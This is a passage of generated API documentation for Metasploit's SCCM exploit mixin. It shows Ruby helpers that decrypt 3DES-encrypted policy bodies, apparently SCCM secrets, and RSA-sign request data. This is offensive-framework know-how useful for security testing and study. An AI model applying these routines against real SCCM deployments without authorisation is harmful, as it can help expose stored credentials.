<span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_DES_EDE3_CBC-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_DES_EDE3_CBC (constant)">OID_DES_EDE3_CBC</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span> <span class='label'>iv_length:</span> <span class='int'>8</span><span class='comma'>,</span> <span class='label'>key_length:</span> <span class='int'>24</span><span class='comma'>,</span> <span class='label'>cipher_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>des-ede3-cbc</span><span class='tstring_end'>&#39;</span></span> <span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='kw'>if</span> <span class='id identifier rubyid_algorithms'>algorithms</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span>
<span class='id identifier rubyid_alg_hash'>alg_hash</span> <span class='op'>=</span> <span class='id identifier rubyid_algorithms'>algorithms</span><span class='lbracket'>[</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_decrypted_key'>decrypted_key</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>!=</span> <span class='id identifier rubyid_alg_hash'>alg_hash</span><span class='lbracket'>[</span><span class='symbol'>:key_length</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Bad key length: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_decrypted_key'>decrypted_key</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='const'>RASN1</span><span class='op'>::</span><span class='const'>Types</span><span class='op'>::</span><span class='const'>OctetString</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_parse!'>parse!</span><span class='lparen'>(</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:parameters</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>!=</span> <span class='id identifier rubyid_alg_hash'>alg_hash</span><span class='lbracket'>[</span><span class='symbol'>:iv_length</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Bad IV length: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_cipher'>cipher</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Cipher</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_alg_hash'>alg_hash</span><span class='lbracket'>[</span><span class='symbol'>:cipher_name</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_decrypt'>decrypt</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='id identifier rubyid_decrypted_key'>decrypted_key</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_decrypted'>decrypted</span> <span class='op'>=</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_update'>update</span><span class='lparen'>(</span><span class='id identifier rubyid_body'>body</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_final'>final</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Decryption routine is currently unsupported: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_decrypted'>decrypted</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_delete_suffix'>delete_suffix</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="rsa_sign-instance_method">
#<strong>rsa_sign</strong>(key, data) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Sign the data using the RSA key, and reverse it (strange, but its whats required)</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
252
253
254
255
256
257</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 252</span>
<span class='kw'>def</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_signature'>signature</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_sign'>sign</span><span class='lparen'>(</span><span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA256</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_signature'>signature</span><span class='period'>.</span><span class='id identifier rubyid_reverse!'>reverse!</span>
<span class='id identifier rubyid_signature'>signature</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:01:50 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue Copy Permalink